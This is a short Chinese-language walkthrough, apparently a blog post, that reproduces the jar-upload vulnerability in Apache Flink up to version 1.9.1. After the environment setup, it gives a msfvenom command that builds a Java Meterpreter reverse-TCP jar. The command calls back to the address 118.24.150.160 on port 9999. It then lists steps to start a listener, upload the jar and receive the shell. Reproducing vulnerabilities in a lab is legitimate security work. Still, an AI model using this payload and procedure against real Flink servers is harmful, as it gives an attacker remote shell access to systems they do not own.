Apache Flink Jar包上传漏洞复现（详细）

搭建环境

1. wget http://mirror.bit.edu.cn/apache/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

2. tar -zxf flink-1.9.1-bin-scala_2.11.tgz

3. ./start-cluster.sh
   记得切换目录，.sh在bin文件夹

出现了一点小插曲：

Please specify JAVA_HOME. Either in Flink config ./conf/flink-conf.yaml or as system-wide JAVA_HOME.

是因为没有装java环境,安装一下即可
不多赘述

ubuntu16.04搭建jdk1.8运行环境
ps：
centos用下面命令安装

yum -y remove java  （不要卸载源码包安装的Java.1.8.0）
yum -y install java   （此时安装的就是1.8.0）

环境搭建完成

漏洞利用

• 生成exp

msfvenom -p java/meterpreter/reverse_tcp LHOST=118.24.150.160 LPORT=9999 -f jar >text.jar

• 开启监听
  
• 上传jar
  
  
• 回弹shell
  

ps:
<= 1.9.1(最新版本)